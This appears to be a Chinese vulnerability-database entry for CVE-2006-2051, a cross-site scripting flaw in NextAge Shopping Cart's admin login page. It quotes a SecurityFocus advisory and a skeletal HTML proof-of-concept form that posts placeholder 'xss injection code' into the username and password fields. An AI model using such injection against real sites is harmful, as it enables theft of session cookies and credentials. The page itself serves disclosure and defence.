NextAge Shopping Cart myadmin/index.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110139 漏洞类型 跨站脚本
发布时间 2006-04-25 更新时间 2006-04-27
CVE编号 CVE-2006-2051 CNNVD-ID CNNVD-200604-496
漏洞平台 PHP CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/27734
https://cxsecurity.com/issue/WLB-2006040112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-496
|漏洞详情
NextAgeShoppingCart中的myadmin/index.php存在多个跨站脚本攻击漏洞。这使得远程攻击者可以借助于参数(1)username和(2)password注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/17685/info

NextAge Shopping Cart is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. 

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

<form method="pst" action="http://www.example.com/[admin_Path]/index.php">
<input type="text" name="txtuserid" class="INPUT" size="30" value="xss injection code">
<br>
<input type="password" name="txtpass" class="INPUT" size="30" value="xss injection code">
<br>
<input <input type="submit" value="submit" class="button">
</form>
|参考资料

来源:BUGTRAQ
名称:20060425NextAgeShoppingCartSoftwareXSS
链接:http://www.securityfocus.com/archive/1/archive/1/431983/100/0/threaded
来源:MISC
链接:http://www.aria-security.net/advisory/nextage/nextageshoppingcart.txt
来源:XF
名称:nextageshoppingcart-index-xss(26065)
链接:http://xforce.iss.net/xforce/xfdb/26065
来源:BID
名称:17685
链接:http://www.securityfocus.com/bid/17685
来源:SREASON
名称:791
链接:http://securityreason.com/securityalert/791